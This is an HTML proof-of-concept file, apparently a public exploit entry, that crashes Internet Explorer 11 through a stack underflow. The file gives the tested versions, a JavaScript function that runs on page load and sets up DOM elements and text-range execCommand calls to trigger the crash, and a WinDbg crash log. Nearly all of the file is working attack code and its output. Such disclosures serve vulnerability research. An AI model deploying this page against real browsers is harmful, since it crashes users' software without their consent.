92 lines
No EOL
3.4 KiB
HTML
92 lines
No EOL
3.4 KiB
HTML
<!--
|
|
# Exploit title: Microsoft Internet Explorer 11 Stack Underflow Crash PoC
|
|
# Date: 09.11.2015
|
|
# Vulnerable version: 11 (32bit version)(newest at the time 11.0.9600.17843 and 11.0.10240.16431)
|
|
# Tested on: Windows 7 64bit and Windows 10(10240) 64bit
|
|
# Author: Mjx
|
|
# http://http://jinxin.pen.io/
|
|
-->
|
|
<!doctype html>
|
|
<html>
|
|
<head>
|
|
<meta http-equiv='Cache-Control' content='no-cache'/>
|
|
|
|
<title>crash IE 11</title>
|
|
<style></style>
|
|
<script type='text/javascript' ></script>
|
|
<script>
|
|
|
|
function crash()
|
|
{
|
|
var id_0 = null;
|
|
id_0 = document.createElement( 'THEAD' );
|
|
document.body.appendChild( id_0 );
|
|
elemTree = [];
|
|
elemTree[0]= document.createElement('SELECT');
|
|
document.all[7].appendChild(elemTree[0]);
|
|
elemTree[1]= document.createElement('B');
|
|
document.all[8].appendChild(elemTree[1]);
|
|
elemTree[2]= document.createElement('SOURCE');
|
|
document.all[0].appendChild(elemTree[2]);
|
|
elemTree[3]= document.createElement('HR');
|
|
document.all[8].appendChild(elemTree[3]);
|
|
elemTree[3].setAttribute('hidden', -4400000000);
|
|
elemTree[4]= document.createElement('SELECT');
|
|
document.all[9].appendChild(elemTree[4]);
|
|
elemTree[5]= document.createElement('RUBY');
|
|
document.all[2].appendChild(elemTree[5]);
|
|
elemTree[6]= document.createElement('OL');
|
|
document.all[4].appendChild(elemTree[6]);
|
|
elemTree[7]= document.createElement('AREA');
|
|
document.all[6].appendChild(elemTree[7]);
|
|
elemTree[8]= document.createElement('ARTICLE');
|
|
document.all[3].appendChild(elemTree[8]);
|
|
elemTree[9]= document.createElement('TEXTAREA');
|
|
document.all[1].appendChild(elemTree[9]);
|
|
txtRange = document.body.createTextRange();
|
|
txtRange.moveEnd('character', 14);
|
|
txtRange.select();
|
|
txtRange.execCommand('insertUnorderedList',true,null);
|
|
txtRange = document.body.createTextRange();
|
|
txtRange.moveEnd('sentence', 4);
|
|
txtRange.select();
|
|
txtRange.execCommand('insertOrderedList',true,null);
|
|
|
|
}
|
|
</script>
|
|
</head>
|
|
<body onload='crash();'>
|
|
|
|
</body>
|
|
</html>
|
|
|
|
<!--
|
|
(1428.1230): Stack overflow - code c00000fd (!!! second chance !!!)
|
|
eax=00000004 ebx=000f0000 ecx=09ab319c edx=00000004 esi=47ce6fd8 edi=00000000
|
|
eip=5fd166d9 esp=09ab3000 ebp=09ab3004 iopl=0 nv up ei pl nz na po nc
|
|
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
|
|
verifier!AVrfpDphAllocateVm+0x9:
|
|
5fd166d9 50 push eax
|
|
0:008> kb
|
|
ChildEBP RetAddr Args to Child
|
|
09ab3004 5fd16800 09ab319c 09ab31a0 00001000 verifier!AVrfpDphAllocateVm+0x9
|
|
09ab3184 5fd16a8d 09ab319c 09ab31a0 00000004 verifier!DphCommitMemoryForPageHeap+0xf0
|
|
09ab31ac 5fd18e5d 000f1000 47de0068 00000000 verifier!AVrfpDphSetProtectionsBeforeUse+0x8d
|
|
09ab31dc 77cf0d96 000f0000 01000002 00000028 verifier!AVrfDebugPageHeapAllocate+0x1fd
|
|
0:008> r
|
|
eax=00000004 ebx=000f0000 ecx=09ab319c edx=00000004 esi=47ce6fd8 edi=00000000
|
|
eip=5fd166d9 esp=09ab3000 ebp=09ab3004 iopl=0 nv up ei pl nz na po nc
|
|
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
|
|
verifier!AVrfpDphAllocateVm+0x9:
|
|
5fd166d9 50 push eax
|
|
0:008> !vprot esp-4
|
|
BaseAddress: 09ab2000
|
|
AllocationBase: 09ab0000
|
|
AllocationProtect: 00000004 PAGE_READWRITE
|
|
RegionSize: 001fe000
|
|
State: 00001000 MEM_COMMIT
|
|
Protect: 00000004 PAGE_READWRITE
|
|
Type: 00020000 MEM_PRIVATE
|
|
|
|
|
|
--> |